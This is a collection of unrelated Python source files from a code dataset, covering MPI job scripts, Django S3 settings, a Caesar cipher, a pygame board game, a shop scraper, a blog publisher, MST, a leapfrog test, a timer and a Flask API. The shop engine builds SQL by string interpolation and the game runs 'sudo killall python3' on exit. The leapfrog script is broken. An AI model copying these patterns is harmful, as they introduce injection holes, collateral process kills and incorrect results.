'/riodir'\n\nmpirun = \"mpirun --report-bindings --np 1 --mca btl '^openib' --rankfile \"\nmpireplay = '/home/kabrown/opt/codes-1.2qx-debug2-withswmfork-intel-isc/bin/model-net-mpi-replay '\n\n#codesargs = ' --synch=1 --workload_type=online --extramem=80000000 --priority_type=1 --payload_sz=65536 --mean_interval=2000 '\n#codesargs = ' --synch=1 --workload_type=online --extramem=50000000 --payload_sz=8192 --max_gen_data=17039360 --mean_interval=305 '\n#codesargs = ' --synch=1 --workload_type=online --extramem=50000000 --payload_sz=65536 --max_gen_data=13107200 --mean_interval=2000 '\n#codesargs = ' --synch=1 --workload_type=online --extramem=10000000 --payload_sz=640 --max_gen_data=6400000 --mean_interval=20 '\n\nif level == 'medium' or level == 'fine':\n codesargs = ' --synch=1 --workload_type=online --extramem=50000000 --payload_sz=640 --priority_type=1 ' # for medium-grain QoS\nelse:\n codesargs = ' --synch=1 --workload_type=online --extramem=50000000 --payload_sz=640 ' # for coarse-grain QoS. priority_type is 0 by default\n\ncodesargs = codesargs + '--lp-io-dir=' + lpiopath + ' --lp-io-use-suffix=1'\n\n\nrankfilepath = basedir + '/rankfiles'\nallocpath = basedir + '/workloads' + '/' + allocname\nnetpath = basedir + '/conf_files'\nnetprefix = 'dfd1088_tapered_'\n\n\n\nrankfiles = glob.glob(os.path.normpath(rankfilepath + \"/rankfile07*\"))\n\nrankfiles.sort()\n#del(rankfiles[:12])\n#pprint(rankfiles)\ni = 0 # For the initial rankfile index\n\n\n\nworkloads = [\n# {'name': 'rand1088', 'qosconf': ['noqos','qos4_1'], 'compute': [0]},\n# {'name': 'spread', 'qosconf': ['noqos'], 'compute': [0]},\n {'name': 'lammps', 'qosconf': ['noqos'], 'compute': [0]},\n# {'name': 'milc', 'qosconf': ['noqos'], 'compute': [0]},\n# {'name': 'many_to_many', 'qosconf': ['noqos'], 'compute': [0]}\n ]\n\n\nfor wk in workloads:\n name = wk['name']\n \n jobcommand = ''\n\n for qos in wk['qosconf']:\n netfile = netpath + '/' + netprefix + qos + '.conf'\n\n for comp in wk['compute']:\n jobtag = name \\\n + '.' + allocname \\\n + '.dc' + str(comp) \\\n + '.' + qos \\\n + '.' + level\n\n outfile = outdir + '/' + 'out.' + jobtag\n jobfile = os.path.normpath(outdir + '/' + str(i).zfill(3) + '.' + jobtag + '.sh')\n\n periodfile = allocpath + '/' + name + '.period'\n loadfile = allocpath + '/' + name + '.load'\n appalloc = allocpath + '/' + name + '.alloc'\n\n jobcommand = mpirun + rankfiles[i] \\\n + ' ' + mpireplay \\\n + ' ' + codesargs \\\n + ' --workload_conf_file=' + loadfile \\\n + ' --alloc_file=' + appalloc \\\n + ' --disable_compute=' + str(comp) \\\n + ' -- ' + netfile \\\n + ' &>> ' + str(outfile)\n\n # Copy settings\n\n\n #pprint(rankfiles[i])\n #print(outfile)\n #print(str(i) + \"------\" + command)\n with open(jobfile, 'w') as f:\n f.write(jobcommand) \n\n st = os.stat(jobfile)\n os.chmod(jobfile, st.st_mode | stat.S_IEXEC)\n\n print(jobfile)\n\n i = i + 1\n if i == len(rankfiles):\n i = 0\n\n\n \nprint(\"Completed.\")\n\n''' \n\nmpirun --report-bindings --np 1 --rankfile /home/kabrown/fs0-ipdps2021/experiments/rankfiles/rankfile0.11 --mca btl '^openib' \\\n\t/home/kabrown/opt/codes-1.2qx-debug2-withswm-intel/bin/model-net-mpi-replay --synch=1 \\\n\t--workload_type=online --extramem=10000000 --disable_compute=1 --debug_cols=1 --priority_type=1 \\\n\t--workload_conf_file=/home/kabrown/fs0-ipdps2021/experiments/workloads/lammps.load \\\n\t--alloc_file=/home/kabrown/fs0-ipdps2021/experiments/workloads/job.lammps.alloc \\\n\t--lp-io-dir=/home/kabrown/fs0-ipdps2021/experiments/lpio/lpio_output --lp-io-use-suffix=1 \\\n\t-- /home/kabrown/fs0-ipdps2021/experiments/conf_files/dfd8k_noqos.conf \\\n\t&>> out.lammps.nocompute\n\n'''\n'''\nprint(\"System size: \", sys_size)\n\nalloc_written = 0\nall_allocs = []\nmarked_nodes = []\nfilename = \"rand\" + str(sys_size)\n#filename += \"_\".join(map(str, alloc_size))\nallocfile = open(filename + '.alloc', 'w')\nloadfile = open(filename + '.load', 'w')\n\ndef new_alloc(size, name, qos):\n global marked_nodes\n\n alloc = []\n for j in range(size):\n k = randint(0, sys_size-1)\n\n while( k in marked_nodes):\n k = randint(0, sys_size-1)\n \n alloc.append(k)\n marked_nodes.append(k)\n\n alloc.sort()\n\n # Write to global file\n global alloc_written\n if(alloc_written != 0):\n allocfile.write(\"\\n\")\n loadfile.write(\"\\n\")\n\n allocfile.write(' '.join(map(str, alloc)))\n loadfile.write(str(size) + ' ' + name + ' ' + str(qos))\n\n alloc_written = alloc_written + 1\n\n #print(\"Allocated: \", size)\n\n # return \n return alloc\n\ndef write_my_file(size, name, qos, alloc, rep):\n flag = ''\n jump = ''\n if rep == 0:\n flag = 'w'\n else:\n flag = 'a'\n jump = '\\n'\n\n with open(name + \".alloc\", flag) as f:\n f.write(jump + ' '.join(map(str, alloc)))\n with open(name+ \".load\", flag) as f:\n f.write(jump + str(size) + ' ' + name + ' ' + str(qos))\n\n\nworkloads = [\n {'name': 'lammps', \n 'size': 2048,\n 'reps': 1,\n 'qos': 1},\n {'name': 'nekbone', \n 'size': 2197,\n 'reps': 1,\n 'qos': 1},\n {'name': 'incast', # scavenger\n 'size': 512,\n 'reps': 1,\n 'qos': 3},\n {'name': 'lammps', \n 'size': 2048,\n 'reps': 1,\n 'qos': 1},\n {'name': 'incast1', # I/O\n 'size': 2,\n 'reps': 128,\n 'qos': 2}\n ]\n\n\nfor wk in workloads:\n for i in range(wk['reps']):\n alloc = new_alloc(wk['size'], wk['name'], wk['qos'])\n write_my_file(wk['size'], wk['name'], wk['qos'], alloc, i)\n\n\n\n#lammps 1\nqos = 1\nsize = 5\nname = \"lammps\"\nalloc = new_alloc(size, name, qos)\nwrite_my_file(name, size, alloc, qos)\n\n\n#lammps 2\nqos = 1\nsize = 5\nname = \"lammps\"\nalloc = new_alloc(size, name, qos)\nwrite_my_file(name, size, alloc, qos)\n\n\n#neckbone\nqos = 1\nsize = 5\nname = \"nekbone\"\nalloc = new_alloc(size, name)\nwrite_my_file(name, size, alloc)\n\n#incast (scavenger)\nqos = 3\nsize = 3\nname = \"incast\"\nalloc = new_alloc(size, name)\nwrite_my_file(name, size, alloc)\n\n#incast2 (bulk data)\nrep = 2\nqos = 2\nname = \"incast2\"\nwith open(name + \".alloc\", 'w') as f:\n with open(name + \".load\", 'w') as g:\n count = 0\n for i in range(3):\n size = 2\n alloc = new_alloc(size, name)\n\n if(count != 0):\n f.write(\"\\n\")\n g.write(\"\\n\")\n\n f.write(' '.join(map(str, alloc)))\n g.write(str(size) + ' ' + name)\n\n count = count +1\n\n\nallocfile.close()\n'''\n\n","sub_path":"scripts/qos/gen_job.py","file_name":"gen_job.py","file_ext":"py","file_size_in_byte":7612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"269132521","text":"# -*- conding: utf-8 -*-\n# This file contains configuration for storages\n# http://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html\n\nimport os\n\n# Backends ******************************************************\nDEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\nSTATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\n\n# AWS Account ***************************************************\nAWS_ACCESS_KEY_ID = os.getenv('AWS_KEY')\nAWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET')\n\n\n# Basic Config ***************************************************************************\n# If set to True the bucket specified in AWS_STORAGE_BUCKET_NAME is automatically created.\nAWS_AUTO_CREATE_BUCKET = True\n\n# Setting AWS_QUERYSTRING_AUTH to False to remove query parameter authentication from generated URLs.\n# This can be useful if your S3 buckets are public.\nAWS_QUERYSTRING_AUTH = False\n\n# By default files with the same name will overwrite each other. Set this to False to have extra characters appended.\nAWS_S3_FILE_OVERWRITE = True\n\nAWS_S3_OBJECT_PARAMETERS = {\n 'CacheControl': 'max-age=86400',\n}\n\nAWS_S3_SIGNATURE_VERSION = 's3v4'\n\n# A path prefix that will be prepended to all uploads, default ''\nAWS_LOCATION = ''\n\n\n# Bucket config *************************************************************************\nAWS_S3_HOST = 's3.ap-northeast-2.amazonaws.com'\nAWS_STORAGE_BUCKET_NAME = 'dibiup-static-v2'\nAWS_S3_CUSTOM_DOMAIN = '{0}.s3.ap-northeast-2.amazonaws.com'.format(AWS_STORAGE_BUCKET_NAME)\nSTATIC_URL = \"http://%s/static/\" % AWS_S3_CUSTOM_DOMAIN\nMEDIA_URL = \"http://%s/user_static/\" % AWS_S3_CUSTOM_DOMAIN\nMEDIA_ROOT = os.path.join(AWS_S3_CUSTOM_DOMAIN, 'user_static')\n\n","sub_path":"dibiup_server_v2/dibiup_server/plugins/storages/storages_config.py","file_name":"storages_config.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"8607929","text":"text = input(\"Enter plain text:\")\nkey = input(\"Enter key:\")\nencry = []\nfor ch in range(len(text)):\n e = ord(text[ch])\n if(e>64 and e<91):\n e = ord(text[ch])+int(key)\n if(e>90):\n set = e-90\n e = set + 64\n encry.append(chr(e))\n if(e>96 and e<123):\n e = ord(text[ch])+int(key)\n if(e>122):\n set = e-122\n e = set + 96\n encry.append(chr(e))\n#for enc in encry:\n \nprint(\"Encrypted Message:\")\nprint(encry)\n\ndecry = []\nfor ch in range(len(encry)):\n d = ord(encry[ch])\n if(d>64 and d<91):\n d = ord(encry[ch])-int(key)\n if(d<65):\n set = 65 - d\n d = 91-set\n decry.append(chr(d))\n if(d>96 and d<123):\n d = ord(encry[ch])-int(key)\n if(d<97):\n set = 97 - d\n d = 123-set\n decry.append(chr(d))\nprint(\"Decrypted Message:\")\nprint(decry) ","sub_path":"Practical-1/caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"459252943","text":"import os\nimport sys\nimport time\nimport pygame\nimport traceback\nimport subprocess\n\nfrom Character import *\nfrom BG import *\n\nturn = 0\nindex = 0\nnowTurn = 0\n\nplayers = []\n\nos.system(\"sudo ./AudioRepeat.sh BGM/Egypt_Theme.mp3 &\")\npygame.init()\n\ncrashed = False\n\ndef GetDice(turn):\n subprocess.run(['python3', \"RF.py\", str(turn)])\n\n f = open(\"result\", 'r')\n result = f.readlines()\n print(result)\n while int(result[0]) != turn:\n time.sleep(0.001)\n\n return result\n\ndef GetTraceBackStr():\n lines = traceback.format_exc().strip().split(\"\\n\")\n rl = [lines[-1]]\n lines = lines[1:-1]\n lines.reverse()\n\n for i in range(0, len(lines), 2):\n rl.append(\"^\\t%s at %s\" % (lines[i].strip(), lines[i+1].strip()))\n\n return '\\n'.join(rl)\n\ntry:\n InitBackground()\n while not crashed:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n crashed = True\n\n if event.type is pygame.KEYDOWN:\n\n if event.key == pygame.K_f:\n ChangeFULL()\n\n if event.key == pygame.K_c:\n ChangeCONN(False)\n\n if event.key == pygame.K_q:\n crashed = True\n\n if event.key == pygame.K_d:\n flag_DOOR = ((flag_DOOR % 4) + 1) * -1\n SetDoor(flag_DOOR)\n\n if event.key == pygame.K_1:\n if not flag_RED:\n flag_RED = True\n players.append(Player(index, \"Red\"))\n index = index + 1\n\n if event.key == pygame.K_2:\n if not flag_BLUE:\n flag_BLUE = True\n players.append(Player(index, \"Blue\"))\n index = index + 1\n\n if event.key == pygame.K_3:\n if not flag_GREEN:\n flag_GREEN = True\n players.append(Player(index, \"Green\"))\n index = index + 1\n\n if event.key == pygame.K_4:\n if not flag_PURPLE:\n flag_PURPLE = True\n players.append(Player(index, \"Purple\"))\n index = index + 1\n\n if event.key == pygame.K_t:\n if index != 0:\n nowTurn = nowTurn + 1\n nowTurn = nowTurn % (index)\n\n elif event.type is pygame.KEYUP:\n if event.key == pygame.K_c:\n ChangeCONN(True)\n\n Frame(players)\n pygame.display.update()\n\n for player in players:\n player.CheckTurn(nowTurn)\n\nexcept Exception as e:\n print(GetTraceBackStr())\n\nfinally:\n os.system(\"sudo killall AudioRepeat.sh\")\n os.system(\"sudo killall mpg123\")\n os.system(\"sudo killall python3\")\n pygame.quit()\n","sub_path":"Board/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"341319583","text":"from sys import stdin, stdout\nfrom Shop.shopFacade import get_product, get_json_product\nfrom Utils.shopDataTypes import ProductProperties, TitleProperties, PriceProperties, ShopWebsiteInfo\nfrom os import rename, getcwd\nfrom os.path import join\nimport sqlite3\nfrom datetime import date\nfrom Utils.shopUtils import store_product, store_shop_website, get_main_url\nfrom Utils.databaseConsts import SHOP_WEBSITES, SHOP_TITLE_IDS, SHOP_IMG_IDS\n\nshopInfos = {}\n\nlast_product = None\nlast_shopInfo = None\nconnection = None\nunknown_website = False\n\ndef get_shop_info(main_url):\n shopInfo = shopInfos.get(main_url, None)\n\n if(not shopInfo):\n cursor = connection.cursor()\n infos = cursor.execute(f\"SELECT * FROM {SHOP_WEBSITES} WHERE url = '{main_url}'\").fetchone()\n if(infos):\n titleIds = cursor.execute(f\"SELECT tag_id FROM {SHOP_TITLE_IDS} WHERE website_id={infos[0]}\").fetchall()\n titleIds = set(map(lambda x: x[0], titleIds)) if titleIds else None\n imgIds = cursor.execute(f\"SELECT tag_id FROM {SHOP_IMG_IDS} WHERE website_id={infos[0]}\").fetchall()\n imgIds = set(map(lambda x: x[0], imgIds)) if imgIds else None\n \n shopInfo = ShopWebsiteInfo.from_db(*infos, titleIds, imgIds)\n\n return shopInfo\n\ndef simple():\n url = stdin.readline().rstrip(\"\\n\")\n\n main_url = get_main_url(url)\n\n last_product, last_shopInfo = get_product(url, main_url)\n\n print(get_json_product(last_product, last_shopInfo.url_id, last_shopInfo.name))\n stdout.flush()\n\ndef handle_item():\n url = stdin.readline().rstrip(\"\\n\")\n global last_product, last_shopInfo, unknown_website\n\n main_url = get_main_url(url)\n shopInfo = get_shop_info(main_url)\n unknown_website = False if shopInfo else True\n if(shopInfo):\n shopInfos[main_url] = shopInfo\n\n last_product, last_shopInfo = get_product(url, main_url, shopInfo)\n\n print(get_json_product(last_product, last_shopInfo.url_id, last_shopInfo.name))\n stdout.flush()\n\ndef handle_show_item():\n print(get_json_product(last_product, last_shopInfo.url_id, last_shopInfo.name))\n stdout.flush()\n\ndef handle_save_item():\n website_id = None\n if(last_product and last_shopInfo):\n cursor = connection.cursor()\n\n if(unknown_website): \n store_shop_website(cursor, last_shopInfo, getcwd())\n shopInfos[last_shopInfo.url] = last_shopInfo\n \n website_id = last_shopInfo.website_id\n store_product(cursor, last_product, last_shopInfo)\n \n connection.commit()\n\n print(website_id)\n stdout.flush()\n\ntable = {\n \"get_item\": handle_item,\n \"show_last_item\": handle_show_item,\n \"save_item\": handle_save_item,\n \"simple\": simple\n}\n\ndef get_in():\n message = stdin.readline()\n return message.rstrip(\"\\n\")\n\ndef main():\n with sqlite3.connect(\"shopTeste.sqlite\") as conn:\n global connection\n connection = conn\n while(True):\n opt = get_in()\n if(opt != \"exit\"):\n if(opt in table): table[opt]()\n else: \n print(\"exit\")\n break\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"engine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439926066","text":"from pydocx import PyDocX\nimport sys, os, time, shutil, docx\n\ndef git_push():\n os.system('git add .')\n os.system(\"git commit -m'backup'\")\n os.system('git push')\n\ndef rename(str):\n new_str = ''\n index = 0\n for i in str:\n if str[index] == '.' and str[index + 1] == 'd' and str[index + 2] == 'o' and str[index + 3] == 'c' and str[index + 4] == 'x':\n break\n new_str = new_str + i\n index += 1\n return new_str\n\ndef main():\n file = \"../../../../Desktop/blog\"\n before = dict ([(f, None) for f in os.listdir (file)])\n while True:\n time.sleep(1)\n after = dict([(f, None) for f in os.listdir(file)])\n added = [f for f in after if not f in before]\n removed = [f for f in before if not f in after]\n\n if added:\n print(\"Added:\", \", \".join(added))\n\n #get(Date)\n date = time.strftime(\"%m-%d-%Y %H:%M\", time.localtime())\n print(date)\n\n #get(Header Lead Label)\n doc = docx.Document(file + \"/\" + \" \".join(added))\n fullText = []\n header = doc.paragraphs[0].text\n label = doc.paragraphs[2].text\n lead = doc.paragraphs[4].text\n print(header)\n print(label)\n print(lead)\n type(lead)\n\n name = rename(\" \".join(added))\n\n #make contents\n html = PyDocX.to_html(file + \"/\" + \" \".join(added))\n f = open(\"article/\" + name + \".html\", 'w', encoding=\"utf-8\")\n f.write(html)\n f.close()\n\n #make pages\n shutil.copy(\"blog-example.html\",\"article/bolg-\" + name + \".html\")\n temp = open(\"article/bolg-\" + name + \".html\", \"r+\")\n str = '
'\n temp.seek(0, 2)\n temp.write(str)\n temp.close()\n\n #get(URL)\n url = \"article/bolg-\" + name + \".html\"\n print(url)\n\n #write all elements(Date URL Header Label Lead)\n blogIndex = open(\"blog-index.txt\",'a+')\n DUHLL = date + \"⊠\" + url + \"⊠\" + header + \"⊠\" + label + \"⊠\" + lead + \"⊠\" + \"\\n\"\n blogIndex.write(DUHLL)\n blogIndex.close()\n\n after = dict([(f, None) for f in os.listdir(file)])\n\n print('test...................')\n\n\n indexHtml = 'Blog
© Hao -- 2019
'\n temp = open(\"blog-index.html\", \"w\")\n temp.write(indexHtml)\n temp.close()\n\n git_push()\n if removed:\n print(\"Removed:\", \", \".join(removed))\n\n before = after\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"blog/auto-push.py","file_name":"auto-push.py","file_ext":"py","file_size_in_byte":5875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"75433083","text":"#Uses python3\nimport sys\nimport math\nfrom collections import defaultdict\nfrom collections import defaultdict\n\n\nclass Node:\n '''\n A simple node class which stores rank and parent, for use in Disjoint Sets.\n By default, the parent is set to itself, unless a new parent is added.\n '''\n def __init__(self, rnk, d):\n self.rank = rnk\n self.parent = self\n self.data = d\n self.size = 1\n\n\nclass DisjointSet:\n '''\n A disjoint set datastructure, for implementing union find operations.\n '''\n\n def __init__(self):\n # The members dictionary hashes the value to the corresponding node\n self.members = dict()\n\n '''\n Input: Value to be retrieved from sets.\n Output: Node corresponding to the value if it is present, None otherwise.\n '''\n def get(self, val):\n if val in self.members:\n return self.members[val]\n else:\n return None\n\n def make_set(self, val):\n if val not in self.members:\n # The rank is initially 0 since it is a new set\n self.members[val] = Node(0, val)\n\n '''\n Takes input of a given node in the members dictionary.\n Returns the root of its set.\n '''\n def find(self, n):\n if n.parent != n:\n self.members[n.data].parent = self.find(n.parent)\n return n.parent\n\n def union(self, n1, n2):\n root_n1 = self.find(n1)\n root_n2 = self.find(n2)\n\n if root_n1 == root_n2:\n return True\n else:\n if root_n1.rank > root_n2.rank:\n self.members[root_n1.data].size += self.members[root_n2.data].size\n self.members[root_n2.data].parent = self.members[root_n1.data]\n elif root_n1.rank < root_n2.rank:\n self.members[root_n2.data].size += self.members[root_n1.data].size\n self.members[root_n1.data].parent = self.members[root_n2.data]\n else:\n self.members[root_n1.data].size += self.members[root_n2.data].size\n self.members[root_n2.data].parent = self.members[root_n1.data]\n self.members[root_n1.data].rank = root_n1.rank+1\ndef minimum_distance(x, y):\n result = 0.\n mapCoords = defaultdict()\n distList = [] \n \n #write your code here\n ds = DisjointSet()\n for i in range(len(x)) :\n mapCoords[i] = [x[i] , y[i]]\n #rprint(\"i= %s %s , %s\" %(i,x[i],y[i]))\n ds.make_set(i)\n \n for start in range(len(x)):\n for end in range(start + 1 ,len(x)):\n xstart,ystart = mapCoords[start][0],mapCoords[start][1]\n xend,yend = mapCoords[end][0],mapCoords[end][1]\n dist = math.sqrt(math.pow(xstart - xend,2) + (math.pow(ystart - yend,2)))\n distList.append([start,end,dist])\n distList.sort(key=lambda x:x[2])\n for edge in distList:\n node1 = ds.get(edge[0])\n node2 = ds.get(edge[1])\n node1Parent = ds.find(node1)\n node2Parent = ds.find(node2)\n #rprint(\"---------------------\\n\")\n #rprint(\"Before Node1Repr = %s Node2Repr = %s\" %(node1Parent.data,node2Parent.data))\n if node1Parent != node2Parent:\n result += edge[2]\n ds.union(node1,node2)\n #rprint(\"Edge = %s\" %(edge))\n\n #rprint(\"After Node1Repr = %s Node2Repr = %s\" %(node1Parent.data,node2Parent.data))\n\n return result\n\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n = data[0]\n x = data[1::2]\n y = data[2::2]\n print(\"{0:.9f}\".format(minimum_distance(x, y)))\n","sub_path":"Graphs/Coursera/Assignments/week5_mst/1_connecting_points/connecting_points_solution.py","file_name":"connecting_points_solution.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"22620760","text":"#By Kay Towner\r\n\r\nprint(\"This method I found online and adjusted it to the equation.\")\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#solve: d2 - (dxdt)**2 + x + 5\r\ndef dif(t=None, h=None, x=None, dxdt=None, d2 = None):\r\n \"\"\"Differential equation to solve.\r\n d2=leapfrogmethod, dxdt=thederivative=0\"\"\"\r\n return -5 - x\r\n\r\nif __name__ == \"__main__\":\r\n #VERIABLES:\r\n h = 0.001 #step size\r\n t = np.arange(0, 50, h) #time\r\n x = 1 #initial condition (position)\r\n dxdt = 0\r\n \r\n v = np.empty(int(h+1)) #velocity initial\r\n x = np.empty(int(h+1))\r\n x[0] = x\r\n v[0] = 0\r\n new = dif(x=x)\r\n\r\n #Leapfrog:\r\n for i in range(0, int(h+1)):\r\n old = new\r\n x[i] = x[i-1] + v[i-1]*h + (1/2)*(old)*h**2\r\n new = dif(x=i)\r\n v[i] = v[i-1] + (1/2)*(old + new)*h\r\n\r\n\r\n\r\n print(\"test 1 v\", v)\r\n print(\"test 2 x[i]:\", x[i])\r\n #plt.plot(x, t)#x and y should be the same size\r\n plt.xlabel('t')\r\n plt.ylabel('t(x)')\r\n #plt.show\r\n","sub_path":"frogtest.py","file_name":"frogtest.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"315650262","text":"# -*- coding: utf-8 -*-\n# 15/6/8\n# create by: snower\n\nimport time\nimport signal\nimport logging\ntry:\n from Queue import Queue, Empty\nexcept ImportError:\n from queue import Queue, Empty\n\n__time_out_callback = None\n__exit_callback = None\n__queues = Queue()\n__is_stop = False\n__current_time = int(time.mktime(time.gmtime()))\n\ndef exit_handler(signum, frame):\n __queues.put((__exit_callback, tuple()), False)\n\ndef handler(signum, frame):\n __queues.put((__time_out_callback, (int(time.mktime(time.gmtime())),)), False)\n\ndef reset():\n global __time_out_callback, __exit_callback, __queues, __is_stop, __current_time\n __time_out_callback = None\n __exit_callback = None\n __queues = Queue()\n __is_stop = False\n __current_time = int(time.mktime(time.gmtime()))\n\ndef start(callback, exit_callback):\n global __time_out_callback, __exit_callback\n __time_out_callback = callback\n __exit_callback = exit_callback\n\ndef stop():\n global __time_out_callback, __exit_callback, __is_stop\n __time_out_callback = None\n __exit_callback = None\n __is_stop = True\n logging.info(\"timer stoping\")\n\ndef loop():\n signal.signal(signal.SIGHUP, exit_handler)\n signal.signal(signal.SIGINT, exit_handler)\n signal.signal(signal.SIGTERM, exit_handler)\n signal.signal(signal.SIGALRM, handler)\n signal.setitimer(signal.ITIMER_REAL, 1, 1)\n logging.info(\"timer ready\")\n while not __is_stop:\n try:\n callback, args = __queues.get(True, 1)\n if callback:\n callback(*args)\n except Empty:\n continue\n\ndef current():\n return __current_time","sub_path":"forsun/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"173187614","text":"#coding=utf-8\nfrom flask import jsonify\nfrom flask.ext.restful import Resource, reqparse\nfrom myapi import db, app\nfrom myapi.model.category import CategoryModel\nfrom myapi.model.project import ProjectModel\nfrom myapi.model.user import UserModel\nfrom myapi.model.bid import BidModel\nfrom myapi.model.enum import project_status, bid_status\n\nclass Project(Resource):\n def get(self, projectid):\n return ProjectModel.query.get(projectid).serialize()\n\n def post(self):\n post_parser = reqparse.RequestParser()\n post_parser.add_argument('name', type=str, location='json', required=True)\n post_parser.add_argument('timespan', type=str, location='json')\n post_parser.add_argument('requirements', type=str, location='json')\n post_parser.add_argument('bonus', type=int, location='json')\n post_parser.add_argument('description', type=str, location='json')\n post_parser.add_argument('bidderQualifiRequire', type=str, location='json')\n post_parser.add_argument('bidderLocationRequire', type=str, location='json')\n post_parser.add_argument('receipt', type=bool , location='json')\n post_parser.add_argument('receiptDescription', type=str, location='json')\n post_parser.add_argument('userid', type=int, location='json', required=True)\n post_parser.add_argument('cids', type=str, location='json', required=True)\n args = post_parser.parse_args()\n\n project = ProjectModel(args.name, \n args.timespan,\n args.requirements,\n args.bonus,\n args.description,\n args.bidderQualifiRequire,\n args.bidderLocationRequire,\n args.receipt,\n args.receiptDescription)\n\n for id in args.cids.split(','):\n category = CategoryModel.query.get(id)\n project.categorys.append(category)\n\n db.session.add(project)\n\n user = UserModel.query.get(args.userid)\n user.publishedProjects.append(project)\n db.session.commit()\n return project.serialize()\n\n def put(self):\n post_parser = reqparse.RequestParser()\n post_parser.add_argument('id', type=int, location='json', required=True)\n post_parser.add_argument('status', type=int, location='json', required=True)\n args = post_parser.parse_args()\n project = ProjectModel.query.get(args.id)\n project.status = args.status\n db.session.commit()\n return project.serialize()\n\nclass ProjectOneStep(Resource):\n def post(self):\n post_parser = reqparse.RequestParser()\n post_parser.add_argument('name', type=str, location='json', required=True)\n post_parser.add_argument('buyerid', type=int, location='json', required=True)\n post_parser.add_argument('sellerid', type=int, location='json', required=True)\n post_parser.add_argument('cids', type=str, location='json', required=True)\n args = post_parser.parse_args()\n\n project = ProjectModel(args.name)\n project.status = project_status.selectBidder\n\n for id in args.cids.split(','):\n category = CategoryModel.query.get(id)\n project.categorys.append(category)\n\n db.session.add(project)\n\n buyer = UserModel.query.get(args.buyerid)\n buyer.publishedProjects.append(project)\n\n seller = UserModel.query.get(args.sellerid)\n seller.wonProjects.append(project)\n\n bid = BidModel()\n bid.user = seller\n bid.status = bid_status.selectBidder\n\n #project = ProjectModel.query.get(args.projectid)\n project.bidders.append(bid)\n\n db.session.commit()\n\n return project.serialize()\n\n\nclass UserPublishedProjects(Resource):\n def get(self, page):\n parser = reqparse.RequestParser()\n parser.add_argument('userid', type=int, location='args', required=True)\n parser.add_argument('status', type=int, location='args', default=0)\n args = parser.parse_args()\n projects = UserModel.query.get(args.userid).publishedProjects\n\n if args.status:\n projects = projects.filter_by(status = args.status)\n\n projects = projects.paginate(page, app.config['POSTS_PER_PAGE'], False)\n return jsonify(total = projects.total,\n pages = projects.pages,\n page = projects.page,\n per_page = projects.per_page,\n has_next = projects.has_next,\n has_prev = projects.has_prev,\n next_num = projects.next_num,\n prev_num = projects.prev_num,\n data=[e.serialize() for e in projects.items])\n\nclass UserParticipateProjects(Resource):\n def get(self, page):\n parser = reqparse.RequestParser()\n parser.add_argument('userid', type=int, location='args', required=True)\n parser.add_argument('status', type=int, location='args', default=0)\n parser.add_argument('winner', type=str, location='args')\n args = parser.parse_args()\n bids = UserModel.query.get(args.userid).bidProjects\n\n if args.status:\n bids = bids.filter(BidModel.project.has(ProjectModel.status == args.status))\n \n if args.winner == 'isMe':\n bids = bids.filter(BidModel.project.has(ProjectModel.winnerid == args.userid))\n\n if args.winner == 'isNotMe':\n bids = bids.filter(BidModel.project.has(ProjectModel.winnerid != args.userid))\n\n bids = bids.paginate(page, app.config['POSTS_PER_PAGE'], False)\n return jsonify(total = bids.total,\n pages = bids.pages,\n page = bids.page,\n per_page = bids.per_page,\n has_next = bids.has_next,\n has_prev = bids.has_prev,\n next_num = bids.next_num,\n prev_num = bids.prev_num,\n data=[e.serialize() for e in bids.items])\n\nfrom sqlalchemy import or_\nclass ProjectList(Resource):\n def get(self, page):\n get_parser = reqparse.RequestParser()\n get_parser.add_argument('cid', type=int, location='args', default=0)\n get_parser.add_argument('keyword', type=str, location='args')\n get_parser.add_argument('status', type=int, location='args', default=0)\n get_parser.add_argument('orderby', type=int, location='args', choices=range(3), default=0)\n get_parser.add_argument('desc', type=int, location='args', choices=range(3), default=0)\n args = get_parser.parse_args()\n \n projects = ProjectModel.query\n\n if args.cid:\n projects = projects.filter( \\\n or_( \\\n ProjectModel.categorys.any(CategoryModel.id == args.cid), \\\n ProjectModel.categorys.any(CategoryModel.parent_id == args.cid), \\\n ProjectModel.categorys.any(CategoryModel.parent.has(CategoryModel.parent_id == args.cid))\n ) \\\n )\n\n if args.keyword:\n projects = projects.filter(ProjectModel.name.contains(args.keyword))\n\n if args.status:\n projects = projects.filter(ProjectModel.status == args.status)\n \n if args.orderby == 1:\n if args.desc == 1:\n projects = projects.order_by(ProjectModel.publishDate.desc())\n else:\n projects = projects.order_by(ProjectModel.publishDate.asc())\n if args.orderby == 2:\n if args.desc == 1:\n projects = projects.order_by(ProjectModel.bonus.desc())\n else:\n projects = projects.order_by(ProjectModel.bonus.asc())\n\n projects = projects.paginate(page, app.config['POSTS_PER_PAGE'], 